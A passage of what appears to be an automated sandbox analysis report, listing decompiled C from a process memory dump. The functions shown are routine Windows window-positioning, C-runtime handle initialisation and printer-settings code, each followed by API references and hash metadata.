								_t28 = _t158 + 0x4c; // 0x4c
								_t195 = _t28;
								_t133 =  *((intOrPtr*)( *_t180 + 0xc))(_t180, 0, 0x12a1098, _t195);
								_v44 = _t133;
								if( *_t195 == 0) {
									_t133 = 0x80004003;
									_v44 = 0x80004003;
								}
								if(_t133 >= 0) {
									L16:
									_t194 = E01279CCC(_t158, _t158, _t190, _t195, __eflags);
									__eflags = _t190;
									if(_t190 != 0) {
										__eflags = _v24.right - _v24.left;
										E0126F9B4(_v48, _v24.left, _v24.top, _v24.right - _v24.left, _v24.bottom - _v24.top, 0);
										E0126FC09(_v48, 0);
									}
									L18:
								} else {
									if(_t190 != 0) {
										E0126F9B4(_v48, _v24.left, _v24.top, _v24.right - _v24.left, _v24.bottom - _v24.top, 0);
										E0126FC09(_v48, 0);
									}
								}
							}
							_pop(_t191);
							return E012833E5(_t158, _v8 ^ _t197, _t186, _t191, _t194);
						}
					}
				}
			}













































                                                                                                                0x0127a39b
                                                                                                                0x0127a39b
                                                                                                                0x0127a39b
                                                                                                                0x0127a3a1
                                                                                                                0x0127a3a8
                                                                                                                0x0127a3ac
                                                                                                                0x0127a3af
                                                                                                                0x0127a3b0
                                                                                                                0x0127a3b5
                                                                                                                0x0127a58a
                                                                                                                0x0127a58a
                                                                                                                0x0127a58f
                                                                                                                0x0127a590
                                                                                                                0x0127a591
                                                                                                                0x0127a596
                                                                                                                0x0127a59d
                                                                                                                0x0127a5a0
                                                                                                                0x0127a5a1
                                                                                                                0x0127a5a7
                                                                                                                0x0127a5a8
                                                                                                                0x0127a5ad
                                                                                                                0x0127a5b6
                                                                                                                0x0127a5b9
                                                                                                                0x0127a5bc
                                                                                                                0x0127a5bf
                                                                                                                0x0127a5c4
                                                                                                                0x0127a5c6
                                                                                                                0x0127a5e5
                                                                                                                0x0127a5f0
                                                                                                                0x0127a5c8
                                                                                                                0x0127a5c9
                                                                                                                0x0127a5d2
                                                                                                                0x0127a5d3
                                                                                                                0x0127a5d4
                                                                                                                0x0127a5d5
                                                                                                                0x0127a5d6
                                                                                                                0x0127a5d6
                                                                                                                0x0127a5fa
                                                                                                                0x0127a600
                                                                                                                0x0127a602
                                                                                                                0x0127a617
                                                                                                                0x0127a617
                                                                                                                0x0127a620
                                                                                                                0x0127a62b
                                                                                                                0x0127a636
                                                                                                                0x0127a3bb
                                                                                                                0x0127a3bb
                                                                                                                0x0127a3c0
                                                                                                                0x00000000
                                                                                                                0x0127a3c6
                                                                                                                0x0127a3cb
                                                                                                                0x0127a3cd
                                                                                                                0x0127a3d2
                                                                                                                0x00000000
                                                                                                                0x0127a3d8
                                                                                                                0x0127a3db
                                                                                                                0x0127a3e5
                                                                                                                0x0127a3e7
                                                                                                                0x0127a3e8
                                                                                                                0x0127a3eb
                                                                                                                0x0127a3ee
                                                                                                                0x0127a3f1
                                                                                                                0x0127a3f4
                                                                                                                0x0127a3f5
                                                                                                                0x0127a3f7
                                                                                                                0x0127a3fa
                                                                                                                0x0127a3fd
                                                                                                                0x0127a400
                                                                                                                0x0127a41c
                                                                                                                0x0127a428
                                                                                                                0x0127a438
                                                                                                                0x0127a444
                                                                                                                0x0127a44a
                                                                                                                0x0127a454
                                                                                                                0x0127a454
                                                                                                                0x0127a45c
                                                                                                                0x0127a45c
                                                                                                                0x0127a45f
                                                                                                                0x0127a460
                                                                                                                0x0127a465
                                                                                                                0x0127a468
                                                                                                                0x0127a46f
                                                                                                                0x0127a4d7
                                                                                                                0x0127a4e0
                                                                                                                0x0127a4e6
                                                                                                                0x0127a4e8
                                                                                                                0x0127a4ea
                                                                                                                0x0127a4f0
                                                                                                                0x0127a4f3
                                                                                                                0x0127a4fa
                                                                                                                0x0127a4fd
                                                                                                                0x0127a503
                                                                                                                0x0127a506
                                                                                                                0x0127a509
                                                                                                                0x0127a50b
                                                                                                                0x0127a516
                                                                                                                0x0127a520
                                                                                                                0x0127a522
                                                                                                                0x0127a525
                                                                                                                0x0127a528
                                                                                                                0x0127a52a
                                                                                                                0x0127a52d
                                                                                                                0x0127a52f
                                                                                                                0x0127a531
                                                                                                                0x0127a534
                                                                                                                0x0127a53e
                                                                                                                0x0127a540
                                                                                                                0x00000000
                                                                                                                0x0127a540
                                                                                                                0x00000000
                                                                                                                0x0127a50d
                                                                                                                0x0127a50d
                                                                                                                0x0127a50b
                                                                                                                0x0127a471
                                                                                                                0x0127a471
                                                                                                                0x0127a473
                                                                                                                0x0127a473
                                                                                                                0x0127a481
                                                                                                                0x0127a487
                                                                                                                0x0127a48a
                                                                                                                0x0127a48c
                                                                                                                0x0127a491
                                                                                                                0x0127a491
                                                                                                                0x0127a496
                                                                                                                0x0127a542
                                                                                                                0x0127a549
                                                                                                                0x0127a54b
                                                                                                                0x0127a54d
                                                                                                                0x0127a55b
                                                                                                                0x0127a568
                                                                                                                0x0127a572
                                                                                                                0x0127a572
                                                                                                                0x0127a577
                                                                                                                0x0127a49c
                                                                                                                0x0127a49e
                                                                                                                0x0127a4bd
                                                                                                                0x0127a4c7
                                                                                                                0x0127a4cc
                                                                                                                0x0127a49e
                                                                                                                0x0127a496
                                                                                                                0x0127a57c
                                                                                                                0x0127a589
                                                                                                                0x0127a589
                                                                                                                0x0127a3d2
                                                                                                                0x0127a3c0

                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 0127A3DB
                                                                                                                • GetDesktopWindow.USER32 ref: 0127A403
                                                                                                                • GetWindowRect.USER32 ref: 0127A41C
                                                                                                                • GetWindowRect.USER32 ref: 0127A428
                                                                                                                  • Part of subcall function 0126F9B4: MoveWindow.USER32(?,?,?,?,?,?), ref: 0126F9D2
                                                                                                                  • Part of subcall function 0126FC09: ShowWindow.USER32(?,?,?,0126D510,?,?,00000000), ref: 0126FC1B
                                                                                                                • IntersectRect.USER32 ref: 0127A5E5
                                                                                                                • EqualRect.USER32 ref: 0127A5F0
                                                                                                                • IsRectEmpty.USER32 ref: 0127A5FA
                                                                                                                • InvalidateRect.USER32(?,?,?), ref: 0127A617
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: RectWindow$DesktopEmptyEqualIntersectInvalidateMoveShowVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 3589585919-0
                                                                                                                • Opcode ID: dca6a36e7cc724d35fa83ec93fdbffd24d437250728f4a5ec95614927b45ca7b
                                                                                                                • Instruction ID: ac04d007095c9b9b9a2e854072df7f9eedc1a5ffc575edf3bb9876a19b80a5f4
                                                                                                                • Opcode Fuzzy Hash: dca6a36e7cc724d35fa83ec93fdbffd24d437250728f4a5ec95614927b45ca7b
                                                                                                                • Instruction Fuzzy Hash: A3912A71E1011AEFDF14DFA8D984EAEBBB9FF48310F144159EA05EB254DB31A940CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01288E15, Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E01288E15(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x12a7740);
				E01283AB0(__ebx, __edi, __esi);
				E0128E025(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E01287F28();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x138a2c8 = _t82;
					 *0x138c044 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x138a2c8; // 0x1510288
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0x138a2c8;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x138bfa0;
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91);
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -20488892
											E0128984A(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E012890C0();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E01283AF5(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0x138c044 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E01287F28(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0x138a2c8[_t149] = _t138;
							 *0x138c044 =  *0x138c044 + _t141;
							__eflags =  *0x138c044;
							while(1) {
								__eflags = _t138 - 0x800 + 0x138a2c8[_t149];
								if(_t138 >= 0x800 + 0x138a2c8[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x138c044; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0x138a2c8[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E0128984A(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E0128A680(_t155, 0x12aa3f0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                                                                                                0x01288e15
                                                                                                                0x01288e17
                                                                                                                0x01288e1c
                                                                                                                0x01288e23
                                                                                                                0x01288e2b
                                                                                                                0x01288e2e
                                                                                                                0x01288e32
                                                                                                                0x01288e33
                                                                                                                0x01288e34
                                                                                                                0x01288e3b
                                                                                                                0x01288e3d
                                                                                                                0x01288e42
                                                                                                                0x01288e5f
                                                                                                                0x01288e64
                                                                                                                0x01288e6a
                                                                                                                0x01288e6f
                                                                                                                0x01288e71
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288e73
                                                                                                                0x01288e79
                                                                                                                0x01288e7c
                                                                                                                0x01288e7f
                                                                                                                0x01288e88
                                                                                                                0x01288e8b
                                                                                                                0x01288e91
                                                                                                                0x01288e94
                                                                                                                0x01288e97
                                                                                                                0x01288e9a
                                                                                                                0x01288e9d
                                                                                                                0x01288e9d
                                                                                                                0x01288ea8
                                                                                                                0x01288eae
                                                                                                                0x01288eb3
                                                                                                                0x01288fe8
                                                                                                                0x01288fea
                                                                                                                0x01288feb
                                                                                                                0x01288feb
                                                                                                                0x01288feb
                                                                                                                0x01288fed
                                                                                                                0x01288fed
                                                                                                                0x01288ff0
                                                                                                                0x01288ff3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288ffe
                                                                                                                0x01289004
                                                                                                                0x01289007
                                                                                                                0x0128900a
                                                                                                                0x0128901e
                                                                                                                0x0128901e
                                                                                                                0x01289022
                                                                                                                0x01289024
                                                                                                                0x0128902b
                                                                                                                0x01289030
                                                                                                                0x01289032
                                                                                                                0x01289032
                                                                                                                0x01289026
                                                                                                                0x01289028
                                                                                                                0x01289028
                                                                                                                0x01289036
                                                                                                                0x0128903c
                                                                                                                0x0128903f
                                                                                                                0x01289042
                                                                                                                0x01289090
                                                                                                                0x01289096
                                                                                                                0x01289099
                                                                                                                0x0128909b
                                                                                                                0x012890a0
                                                                                                                0x012890a2
                                                                                                                0x012890a7
                                                                                                                0x012890a7
                                                                                                                0x00000000
                                                                                                                0x01289044
                                                                                                                0x01289044
                                                                                                                0x01289046
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01289049
                                                                                                                0x0128904f
                                                                                                                0x01289051
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01289056
                                                                                                                0x01289058
                                                                                                                0x0128905d
                                                                                                                0x01289060
                                                                                                                0x0128906a
                                                                                                                0x0128906d
                                                                                                                0x01289078
                                                                                                                0x0128907f
                                                                                                                0x01289083
                                                                                                                0x01289088
                                                                                                                0x0128908b
                                                                                                                0x012890aa
                                                                                                                0x012890aa
                                                                                                                0x00000000
                                                                                                                0x012890aa
                                                                                                                0x01289073
                                                                                                                0x01289073
                                                                                                                0x01289075
                                                                                                                0x01289075
                                                                                                                0x00000000
                                                                                                                0x01289075
                                                                                                                0x01289066
                                                                                                                0x00000000
                                                                                                                0x01289066
                                                                                                                0x01289042
                                                                                                                0x0128900c
                                                                                                                0x0128900e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01289016
                                                                                                                0x00000000
                                                                                                                0x01289016
                                                                                                                0x012890b0
                                                                                                                0x012890b3
                                                                                                                0x012890b8
                                                                                                                0x012890b8
                                                                                                                0x012890ba
                                                                                                                0x012890bf
                                                                                                                0x012890bf
                                                                                                                0x01288eb9
                                                                                                                0x01288ebc
                                                                                                                0x01288ebe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288ec4
                                                                                                                0x01288ec6
                                                                                                                0x01288ec9
                                                                                                                0x01288ecc
                                                                                                                0x01288ed1
                                                                                                                0x01288ed9
                                                                                                                0x01288edb
                                                                                                                0x01288edd
                                                                                                                0x01288edf
                                                                                                                0x01288edf
                                                                                                                0x01288ee4
                                                                                                                0x01288ee4
                                                                                                                0x01288ee5
                                                                                                                0x01288ee8
                                                                                                                0x01288ee8
                                                                                                                0x01288eee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288efa
                                                                                                                0x01288efc
                                                                                                                0x01288eff
                                                                                                                0x01288f01
                                                                                                                0x01288f9b
                                                                                                                0x01288fa2
                                                                                                                0x01288fa2
                                                                                                                0x01288fa8
                                                                                                                0x01288fb4
                                                                                                                0x01288fb6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288fb8
                                                                                                                0x01288fbe
                                                                                                                0x01288fc1
                                                                                                                0x01288fc4
                                                                                                                0x01288fc8
                                                                                                                0x01288fce
                                                                                                                0x01288fd1
                                                                                                                0x01288fd4
                                                                                                                0x01288fd7
                                                                                                                0x01288fd7
                                                                                                                0x01288fdc
                                                                                                                0x01288fdd
                                                                                                                0x01288fe0
                                                                                                                0x00000000
                                                                                                                0x01288fe0
                                                                                                                0x01288f07
                                                                                                                0x01288f0d
                                                                                                                0x00000000
                                                                                                                0x01288f0d
                                                                                                                0x01288f10
                                                                                                                0x01288f12
                                                                                                                0x01288f17
                                                                                                                0x01288f18
                                                                                                                0x01288f1b
                                                                                                                0x01288f1e
                                                                                                                0x01288f1e
                                                                                                                0x01288f20
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288f26
                                                                                                                0x01288f28
                                                                                                                0x01288f2b
                                                                                                                0x01288f88
                                                                                                                0x01288f88
                                                                                                                0x01288f89
                                                                                                                0x01288f8f
                                                                                                                0x01288f90
                                                                                                                0x01288f93
                                                                                                                0x01288f96
                                                                                                                0x00000000
                                                                                                                0x01288f96
                                                                                                                0x01288f2d
                                                                                                                0x01288f2f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288f31
                                                                                                                0x01288f33
                                                                                                                0x01288f35
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288f37
                                                                                                                0x01288f39
                                                                                                                0x01288f49
                                                                                                                0x01288f56
                                                                                                                0x01288f5d
                                                                                                                0x01288f62
                                                                                                                0x01288f69
                                                                                                                0x01288f73
                                                                                                                0x01288f77
                                                                                                                0x01288f7c
                                                                                                                0x01288f7f
                                                                                                                0x01288f7f
                                                                                                                0x01288f7f
                                                                                                                0x01288f82
                                                                                                                0x01288f85
                                                                                                                0x01288f85
                                                                                                                0x00000000
                                                                                                                0x01288f85
                                                                                                                0x01288f3c
                                                                                                                0x01288f42
                                                                                                                0x01288f45
                                                                                                                0x01288f47
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01288f47
                                                                                                                0x00000000
                                                                                                                0x01288f1e
                                                                                                                0x01288e57
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 01288E23
                                                                                                                  • Part of subcall function 0128E025: __mtinitlocknum.LIBCMT ref: 0128E037
                                                                                                                  • Part of subcall function 0128E025: EnterCriticalSection.KERNEL32(00000000,?,01288D16,0000000D), ref: 0128E050
                                                                                                                • __calloc_crt.LIBCMT ref: 01288E34
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 01288E4F
                                                                                                                • GetStartupInfoW.KERNEL32(?,012A7740,00000064,0128377F,012A7630,00000014), ref: 01288EA8
                                                                                                                • __calloc_crt.LIBCMT ref: 01288EF3
                                                                                                                • GetFileType.KERNEL32(00000001), ref: 01288F3C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 2541412234-0
                                                                                                                • Opcode ID: 701e064d3cb38e0a06556b890e15ed6dd5603c019b0c0b5ded5b59debdbf4760
                                                                                                                • Instruction ID: 3083b08cc678d4dade44800f80461e3d1b21bb424f961c4a60869d0bdbf90226
                                                                                                                • Opcode Fuzzy Hash: 701e064d3cb38e0a06556b890e15ed6dd5603c019b0c0b5ded5b59debdbf4760
                                                                                                                • Instruction Fuzzy Hash: 8481D2719263428FDF20DF68C8406BDBBF4AF5A324B64425ED266AB3C1D7369843CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01263C96, Relevance: 12.1, APIs: 8, Instructions: 63memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E01263C96(void* __ecx, char* _a4) {
				void* _v8;
				struct _PRINTER_DEFAULTS* _t17;
				void* _t22;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				if( *(__ecx + 0x78) != 0) {
					_t17 = lstrcmpA(( *(GlobalLock( *(__ecx + 0x78)) + 2) & 0x0000ffff) + _t18, _a4);
					if(_t17 == 0) {
						_t17 = OpenPrinterA(_a4,  &_v8, _t17);
						if(_t17 != 0) {
							if( *(_t35 + 0x74) != 0) {
								E0126FDC2( *(_t35 + 0x74));
							}
							_t22 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x74) = _t22;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t22), 0, 2) != 1) {
								E0126FDC2( *(_t35 + 0x74));
								 *(_t35 + 0x74) = 0;
							}
							_t17 = ClosePrinter(_v8);
						}
					}
				}
				return _t17;
			}







                                                                                                                0x01263c99
                                                                                                                0x01263c9b
                                                                                                                0x01263ca1
                                                                                                                0x01263cbd
                                                                                                                0x01263cc5
                                                                                                                0x01263ccf
                                                                                                                0x01263cd6
                                                                                                                0x01263cdc
                                                                                                                0x01263ce1
                                                                                                                0x01263ce1
                                                                                                                0x01263cfa
                                                                                                                0x01263d01
                                                                                                                0x01263d1b
                                                                                                                0x01263d20
                                                                                                                0x01263d25
                                                                                                                0x01263d25
                                                                                                                0x01263d2b
                                                                                                                0x01263d2b
                                                                                                                0x01263cd6
                                                                                                                0x01263d30
                                                                                                                0x01263d35

                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 01263CB1
                                                                                                                • lstrcmpA.KERNEL32(?,?), ref: 01263CBD
                                                                                                                • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 01263CCF
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 01263CF2
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 01263CFA
                                                                                                                • GlobalLock.KERNEL32 ref: 01263D04
                                                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 01263D13
                                                                                                                • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 01263D2B
                                                                                                                  • Part of subcall function 0126FDC2: GlobalFlags.KERNEL32(?), ref: 0126FDCF
                                                                                                                  • Part of subcall function 0126FDC2: GlobalUnlock.KERNEL32(?,?,?,?,00000000), ref: 0126FDE0
                                                                                                                  • Part of subcall function 0126FDC2: GlobalFree.KERNEL32 ref: 0126FDEA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 168474834-0
                                                                                                                • Opcode ID: c0826decd48b215c97ee75953746c0e503d7a3d7d5e43d8e650bbdc0586d1be6
                                                                                                                • Instruction ID: ccea4d5384f5ed77f0bb8640ae7f059df5313afc5d96d43f6c631557f6e9a27a
                                                                                                                • Opcode Fuzzy Hash: c0826decd48b215c97ee75953746c0e503d7a3d7d5e43d8e650bbdc0586d1be6
                                                                                                                • Instruction Fuzzy Hash: A4115EB1560609BEFF22AFB8DD48EBB7AECFF14644F000569BB0581060D632DD90DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01265E77, Relevance: 10.8, APIs: 7, Instructions: 268memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E01265E77(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct tagRECT _t141;
				signed int _t148;
				short* _t150;
				signed int _t155;
				signed int _t156;
				void* _t170;
				signed int _t181;
				intOrPtr _t182;
				void* _t188;
				signed int _t191;
				short _t198;
				intOrPtr* _t200;
				intOrPtr _t202;
				signed int _t204;
				signed int _t209;
				intOrPtr _t210;
				signed int* _t214;
				intOrPtr _t232;
				signed int _t235;
				intOrPtr* _t237;
				intOrPtr* _t238;
				signed int* _t243;
				signed int* _t245;
				intOrPtr _t250;
				signed int _t253;
				signed int _t254;
				void* _t255;

				_push(0xa8);
				E01285BAD(E01296FE5, __ebx, __edi, __esi);
